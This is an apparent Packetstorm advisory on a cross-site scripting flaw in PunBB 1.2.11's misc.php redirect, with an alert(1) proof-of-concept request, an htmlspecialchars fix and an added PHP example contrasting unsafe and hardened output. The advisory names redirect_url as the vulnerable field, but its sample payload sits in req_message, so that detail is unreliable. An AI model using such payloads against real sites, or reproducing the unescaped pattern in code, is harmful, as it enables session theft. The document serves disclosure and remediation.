punBB1211.txt

2006-05-06T00:00:00
ID PACKETSTORM:46098
Type packetstorm
Reporter D3vil-0x1
Modified 2006-05-06T00:00:00

Description

                                        
PunBB 1.2.11 Cross-Site Scripting

File name :- misc.php
Action :- Send Email
Line :- 123

[php]
redirect($_POST['redirect_url'], $lang_misc['E-mail sent redirect']);
[/php]

$_POST['redirect_url'] is unfiltered input: it is passed to redirect() without any escaping.

Exploit :-

Send a POST request:

[code]
GET :-
/PunBB/misc.php?email=2
POST :-
form_sent=1&redirect_url=index.php&req_subject=test&req_message=test"><script>alert(1);</script>
[/code]

Fix :-

Replace the line with :-

[php]
redirect(htmlspecialchars($_POST['redirect_url']), $lang_misc['E-mail sent redirect']);
[/php]
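
Added example (not part of the original advisory and not PunBB's code): a hypothetical stand-in for a redirect page, showing the unescaped output next to a hardened version. The function names, the page markup and the rule that only the board's own relative .php pages are valid targets are assumptions; the target check goes beyond the advisory's one-line fix.

```php
<?php
// Added example: hypothetical stand-in for a redirect page, not PunBB's redirect().

// Vulnerable pattern from the advisory: the value reaches the markup as-is.
function render_redirect_unsafe(string $url, string $message): string
{
    return '<meta http-equiv="refresh" content="1;URL=' . $url . '" />' . "\n"
         . '<p>' . $message . ' <a href="' . $url . '">Continue</a></p>';
}

// Assumption: the board only ever redirects to its own relative .php pages,
// so anything else falls back to a fixed default.
function safe_redirect_target(string $url, string $default = 'index.php'): string
{
    return preg_match('/\A[a-z_]+\.php(\?[A-Za-z0-9_=&;.-]*)?\z/', $url) === 1 ? $url : $default;
}

// Hardened pattern: validate the target, then escape for the attribute context.
function render_redirect_safe(string $url, string $message): string
{
    $target = htmlspecialchars(safe_redirect_target($url), ENT_QUOTES, 'UTF-8');
    $text = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
    return '<meta http-equiv="refresh" content="1;URL=' . $target . '" />' . "\n"
         . '<p>' . $text . ' <a href="' . $target . '">Continue</a></p>';
}

// Constructed sample inputs; the second reuses the advisory's test string.
$samples = [
    'index.php',
    'test"><script>alert(1);</script>',
    'viewtopic.php?id=5&p=2',
    'http://other-site.example/',
];

foreach ($samples as $input) {
    echo "input:  $input\n";
    echo "unsafe: " . render_redirect_unsafe($input, 'E-mail sent.') . "\n";
    echo "safe:   " . render_redirect_safe($input, 'E-mail sent.') . "\n\n";
}
```

ENT_QUOTES also escapes single quotes, which htmlspecialchars() with its older default flags leaves untouched.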